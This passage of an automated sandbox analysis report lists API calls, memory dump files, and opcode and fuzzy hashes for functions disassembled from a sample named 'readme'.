                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF81C0316047494FC724DF39989057BB7F1AF853117148A2FE6A787B81DB38E805CB68
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401181
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004011B1
                                                                                                                                                                                                          • timeGetTime.WINMM ref: 004011C5
                                                                                                                                                                                                          • timeGetTime.WINMM ref: 004011D5
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004011E3
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0040122A
                                                                                                                                                                                                          • timeGetTime.WINMM ref: 0040123E
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401261
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0040129E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeaveTimetime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3486229058-0
                                                                                                                                                                                                          • Opcode ID: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                                                                          • Instruction ID: b4a63a4f06c8fcffd2d454e61e85ed039b73bf68413dd997414ba6e559c29426
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6641D6357003148FCB309F60E80466BB7F4AF6575470486AEE896BB3E1DB38EC459AA5
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(00000020,00000000), ref: 00411B68
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExchangeInterlocked
                                                                                                                                                                                                          • String ID: GET$_bytesLoaded$_bytesTotal$_customHeaders$contentType$loaded
                                                                                                                                                                                                          • API String ID: 367298776-2876428247
                                                                                                                                                                                                          • Opcode ID: bc7a406daf2fbb0983bef868be79dd6fb756b60b2efaa2edd4b44b4e4be769b1
                                                                                                                                                                                                          • Instruction ID: 337a073203a489cf9af6a636d5e82807fd5ac3b12a53b57697a6972a4ae57270
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc7a406daf2fbb0983bef868be79dd6fb756b60b2efaa2edd4b44b4e4be769b1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6D126706047056BC714EF65D842AABB7E5BF88304F404A2EFA4687392EB38F945C799
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 0079E960
                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 0079EA6E
                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 0079EBC0
                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 0079EBDB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                          • API String ID: 2751267872-393685449
                                                                                                                                                                                                          • Opcode ID: 239a4af11f55f81595298fdd8f27fa6654470999d4af52818c577849b92c20b2
                                                                                                                                                                                                          • Instruction ID: f9205ae31db05b9c3e77d0985b0ed2a32128f774b51f4989d9f1137d4a0a37b6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 239a4af11f55f81595298fdd8f27fa6654470999d4af52818c577849b92c20b2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3B15C71800209EFCF29DFA4E8859AEBBB5FF14310F14455AE815AB212D739EE51CF92
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,004F5BA3,00000000), ref: 004F34EA
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3537
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3545
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3556
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F355F
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3594
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F359D
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36AD
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36BB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2801635615-0
                                                                                                                                                                                                          • Opcode ID: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                                                                          • Instruction ID: 93c01fc31a9ee7373f9c1d93048bf40271cec5808ab28bfcb2eca2428eaae834
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F51BE3020474A9BD7249F319558BBBBBF8AF84742F04485EE5DEC3361DB28EA08C724
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 004F3709
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F374C
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F375C
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F376D
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F377A
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F37A9
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F37C5
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F37D5
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F37EC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                          • Opcode ID: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                                                                          • Instruction ID: 1822ab8b2bc00c4b335a7296647f06df4fe24da2c1cedc303b1505dbbb5a7089
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2831D1B11087894BC610AF35A9807EBFBF8BF89714F04499DE5E953251C734AA1DC726
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0079D977
                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0079D97F
                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0079DA08
                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0079DA33
                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0079DA88
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                          • Opcode ID: 37b7ffcd75580574b2bed498a0d55029e147ec6556988c79b4e43bfdd644b3e9
                                                                                                                                                                                                          • Instruction ID: e60fa94935fac86d4f2411bee0f06bae9fa08a52f082d528d61211fb7b327bd8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37b7ffcd75580574b2bed498a0d55029e147ec6556988c79b4e43bfdd644b3e9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B41D634A04208DFCF20DF68E885A9E7BB5FF45324F14C155E9196B392D739AD11CB91
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: localhost
                                                                                                                                                                                                          • API String ID: 0-2663516195
                                                                                                                                                                                                          • Opcode ID: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                                                                          • Instruction ID: cf482c115b2fa46a5b5609c5aae3d134ea41c2cdeafd480f3feffcf81808ee73
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9131ED30208311ABDB20DF249C85BBBB7E5FF95710F004A1EF9559B381E7719948C7A6
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • timeGetTime.WINMM(00000000), ref: 004145E1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Timetime
                                                                                                                                                                                                          • String ID: gfff$gfff$gfff$gfff
                                                                                                                                                                                                          • API String ID: 17336451-2178600047
                                                                                                                                                                                                          • Opcode ID: 36ada0748ce7ae867fc8d0b968c8e92e83edef51ded80e37bf17f681d92f4674
                                                                                                                                                                                                          • Instruction ID: e32ce3efbecf0e845fb5c017bd6949167df468d5a0ad1b28c98723774e94ba96
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36ada0748ce7ae867fc8d0b968c8e92e83edef51ded80e37bf17f681d92f4674
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79C17E313046059BD718DF15C494BEA77A6BFC8704F18856EE8498F382CB79ED42CB9A
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • timeKillEvent.WINMM(?,?,?,00000000,?,0041D4A9), ref: 004D8B13
                                                                                                                                                                                                          • Sleep.KERNEL32(00000001,?,0041D4A9), ref: 004D8B2D
                                                                                                                                                                                                          • waveOutReset.WINMM(?,?,0041D4A9), ref: 004D8B34
                                                                                                                                                                                                          • waveOutUnprepareHeader.WINMM(?,-000013C4,00000020,?,?,0041D4A9), ref: 004D8B5A
                                                                                                                                                                                                          • Sleep.KERNEL32(00000001,?,?,0041D4A9), ref: 004D8B63
                                                                                                                                                                                                          • waveOutClose.WINMM(?,?,0041D4A9), ref: 004D8B86
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wave$Sleep$CloseEventHeaderKillResetUnpreparetime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3030913982-0
                                                                                                                                                                                                          • Opcode ID: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                                                                          • Instruction ID: 723e303dfaa0e6e3e16fcc3d7d301ea8209cd941138754b25ec6b12d62c8e06b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0401ADB5A00214ABC3149F14EC88AAEB7F8FB98B11F00091BF41497301CB79A9598BF5
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000,?,?,?,00000000,2E736D6D,?,?,00000000,00000000), ref: 004CF94E
                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,-00000001,00000000,00000000,2E736D6D,?,?,00000000,00000000), ref: 004CF99D
                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000), ref: 004CF9BF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                          • API String ID: 823142352-4282027825
                                                                                                                                                                                                          • Opcode ID: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                                                                          • Instruction ID: d900b4c61e2357813c95f9d4093febd61d3ae0210469f6574eac6d9984f09979
                                                                                                                                                                                                          • Opcode Fuzzy Hash: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A141C2B5904300BBEB50EB21DC86F1B77A9EB89348F24092EF54597381D63DDC48C7A6
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,004DDFDB,000000FF,00000001,004DE7BA), ref: 004DD6FC
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004DD71E
                                                                                                                                                                                                            • Part of subcall function 004FA760: EnterCriticalSection.KERNEL32(?,?,00000000,0015381C,?,004DD732), ref: 004FA76A
                                                                                                                                                                                                            • Part of subcall function 004FA760: LeaveCriticalSection.KERNEL32(?), ref: 004FA77A
                                                                                                                                                                                                            • Part of subcall function 004DC9A0: EnterCriticalSection.KERNEL32 ref: 004DCA0C
                                                                                                                                                                                                            • Part of subcall function 004DC9A0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 004DCA1D
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD741
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD744
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004DD74C
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD771
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD774
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                          • Opcode ID: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                                                                          • Instruction ID: 32add75de912499d63db8df7e296ef1919b4cd71e3024a8d459c2c8f380e6b48
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59012975302A155FD324EB2ADC90B6BE3F9AF91354F00842FE546C3750CB64FC058AA9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,STATIC,Dummy,80000000,00000000,00000000,00000005,00000005,00000000,00000000,00000000,00000000), ref: 004D866B
                                                                                                                                                                                                          • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 004D8683
                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,004D8520), ref: 004D8690
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
